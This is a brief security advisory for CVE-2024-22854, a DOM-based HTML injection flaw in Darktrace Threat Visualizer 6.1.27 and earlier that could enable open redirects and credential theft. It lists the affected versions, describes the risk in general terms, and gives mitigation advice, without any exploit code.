CVE-2024-22854

Name of the Vulnerable Software and Affected Versions Darktrace Threat Visualizer versions 6.1.27 and before

Description A DOM-based HTML injection vulnerability has been identified in the main page of Darktrace Threat Visualizer. This issue allows a remote attacker to craft a URL that, when visited by an authenticated user, can lead to open redirect and potential credential stealing using an injected HTML form.

Recommendations For Darktrace Threat Visualizer versions 6.1.27 and before, consider disabling access to the main page until a patch is available to prevent potential credential stealing. Restrict access to the vulnerable component to minimize the risk of exploitation. Avoid using the vulnerable version until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.